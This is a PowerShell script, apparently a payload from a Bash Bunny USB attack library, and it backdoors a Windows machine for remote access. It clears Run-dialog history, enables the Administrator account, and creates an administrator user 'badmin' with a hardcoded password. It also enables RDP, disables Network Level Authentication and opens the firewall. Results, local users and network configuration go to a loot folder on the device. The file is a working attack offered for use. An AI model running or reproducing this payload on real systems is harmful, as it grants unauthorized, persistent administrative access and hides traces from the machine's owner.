bashbunny-payloads/payloads/library/remote_access/RDP-Enable/p.ps1

# Vars for log
$destFile = ("$env:COMPUTERNAME-{0:yyyy-MM-dd-HH-mm-ss}.log" -f (Get-Date))
$destPath = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\badmin')
$dest = "$destPath\$destFile"

# Vars for user stuff
$NUser = "badmin"
$Password = convertto-securestring "th!s15@planetbanna" -asplaintext -force
$Group = "Administrators"

# Clear Run history
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name * -ErrorAction SilentlyContinue

# Enable admin account and set pw
Enable-LocalUser -Name Administrator -ErrorAction SilentlyContinue
Set-LocalUser -Name Administrator -PasswordNeverExpires $true -Password $Password -ErrorAction SilentlyContinue

# Create new user and make admin
New-LocalUser $NUser -Password $Password -PasswordNeverExpires -ErrorAction SilentlyContinue
Add-LocalGroupMember $Group $NUser -ErrorAction SilentlyContinue

# Enable RDP
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" -Value 0 -ErrorAction SilentlyContinue
Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" -Value 0 -ErrorAction SilentlyContinue
Enable-NetFirewallRule -DisplayGroup "Remote Desktop" -ErrorAction SilentlyContinue

# Log things now
$rdpenabled = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\' -Name "fDenyTSConnections" | Select-Object -expandProperty fDenyTSConnections
If ($rdpenabled -eq 0)
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: success"
}

Else
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP enabled: fail"
}

$rdpinsecure = Get-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\' -Name "UserAuthentication" | Select-Object -expandProperty UserAuthentication
If ($rdpinsecure -eq 0)
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: success"
}

Else
{
    Add-Content -Path $dest -Value "$(Get-Date -Format G) NLA disabled: fail"
}

Add-Content -Path $dest -Value "$(Get-Date -Format G) RDP group firewall rules status:"
Get-NetFirewallRule -DisplayGroup "Remote Desktop" | Select-Object DisplayName, Enabled | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value "$(Get-Date -Format G) Local users:"
Get-LocalUser | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value "$(Get-Date -Format G) IP Config /all"
& ipconfig /all | Out-File -Append -FilePath $dest -Encoding ASCII
Add-Content -Path $dest -Value ""
Add-Content -Path $dest -Value "Have a nice day ;)"